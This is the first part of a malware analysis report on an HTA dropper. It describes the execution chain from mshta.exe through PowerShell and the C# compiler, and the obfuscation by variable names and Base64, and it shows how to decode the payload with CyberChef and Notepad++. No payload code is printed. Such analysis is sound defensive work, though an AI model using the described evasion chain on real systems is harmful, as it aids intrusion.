Analysis Malicious Shellcode ( HTA as Dropper ) Part 1

 

In this malware analysis report, we will conduct an in-depth exploration of shellcode, following its journey from an HTA file to PowerShell, and subsequently from PowerShell to the shellcode itself. This process will involve carefully analyzing each stage to uncover the techniques and methods used to execute malicious activities. Finally, we will perform a detailed examination of the shellcode and execute it within our controlled lab environment to better understand its behavior and potential impact.

Graph :

This graph represents a detailed execution chain commonly seen in malicious activity. It begins with mshta.exe, a tool used to execute HTML Application (HTA) files, suggesting the initial payload is delivered via an HTA file. The chain then progresses to cmd.exe, which is used to execute system commands, and subsequently launches powershell.exe. PowerShell is executed multiple times, indicating it is being used to download or execute additional scripts, deliver payloads, or escalate privileges. The involvement of conhost.exe (Console Host) shows interaction with the command line environment. Further down the chain, csc.exe (C# Compiler) is invoked, likely to compile a malicious script or payload into an executable. Finally, the sequence concludes with cvres.exe, which is typically associated with managing resources in compiled applications, suggesting some form of binary creation or modification. This flow highlights a sophisticated use of native Windows tools for executing and compiling malicious code, utilizing obfuscation and chaining techniques to evade detection and maintain persistence.

Source Code Analysis and Deobfuscation : The image below shows a screenshot of the sample, which was opened using Notepad++ since the .hta file is a plain text code that can easily be opened in any text editor. Upon examining the sample, it appears to be obfuscated in two distinct ways: 1. Obfuscated variable names: The variable names have been intentionally obfuscated, making it harder for malware analysts to easily understand the code. This technique is commonly used to confuse and delay analysis. 2. Base64 encoding: A section of the code is encoded in Base64, a common encoding method used by threat actors for defense evasion. This encoding is frequently employed to obscure the true content of the code and make it harder to read and analyze at first glance. Both of these obfuscation methods are commonly used by malicious actors to evade detection and analysis, making it more challenging for cybersecurity professionals to identify the true purpose and functionality of the file without further decoding and analysis.

To continue with the analysis of this malware sample, we need to follow these steps: 1. Copy the Entire Base64 Encoded Code: From the sample, we need to locate the section of the code that has been encoded in Base64. Carefully copy the entire encoded string. 2. Use CyberChef for Decoding: We will paste the copied Base64 string into CyberChef, a popular tool used for decoding and transforming data. CyberChef can easily decode the Base64 encoded data into readable text or executable code, which will give us a clearer understanding of the malicious functionality embedded within the sample. 3. Understand the Malicious Code: Once decoded, we will analyze the content to identify any potential malicious actions, such as commands being executed, files being created or modified, network connections being established, or other suspicious behavior that could indicate the nature of the malware. By decoding the Base64 content, we move one step closer to uncovering the true intent of the sample and determining whether it poses a real threat. As shown in the image below, after successfully decoding the Base64 encoded malicious code, we encounter some challenges in understanding the content due to the presence of NULL byte values. These NULL bytes can obscure the readability of the code. To resolve this issue and make the code clearer, follow these steps in CyberChef: 1. Use the "Remove Null Byte" Filter: In the CyberChef interface, locate the search box or operations panel. Here, you can apply the "Remove Null Byte" operation, which will remove any NULL bytes (represented as \x00) from the decoded code. This operation will clean up the code and make it easier to read and analyze. 2. Re-analyze the Code: Once the NULL bytes are removed, the code should be much clearer. You can now proceed with further analysis to determine the functionality of the code and identify any malicious behavior, such as network connections, file manipulation, or execution of other payloads. By applying this filter, you eliminate unnecessary noise from the code and gain a more accurate view of the malware's behavior, making it easier to understand its purpose and potential impact. 

Before Remove NULL Byte Filter :

After Applying Remove Null Byte :

After using the "Remove Null Byte" filter in CyberChef and successfully clearing the decoded malicious code, the next step is to copy the entire cleaned code and paste it into Notepad++ for further analysis. 1. Copy the Cleaned Code: In CyberChef, once the NULL bytes are removed and the code is decodable, select and copy the entire cleaned-up code. 2. Paste into Notepad++: Open Notepad++ and paste the copied code into a new document. Notepad++ is a powerful text editor that supports various programming languages and formats, which will help you better view and analyze the code. 3. Analyze the Code: In Notepad++, you can: o Use the syntax highlighting to make the code more readable. o Search for specific keywords or suspicious functions to understand the flow of the code. o Use regular expressions to look for patterns or encoded strings, URLs, or IPs within the code. This method will allow you to gain a deeper understanding of the sample and its potential malicious intent, which is crucial for the next stage of your analysis.

Our decoded code screenshot from notepad ++ :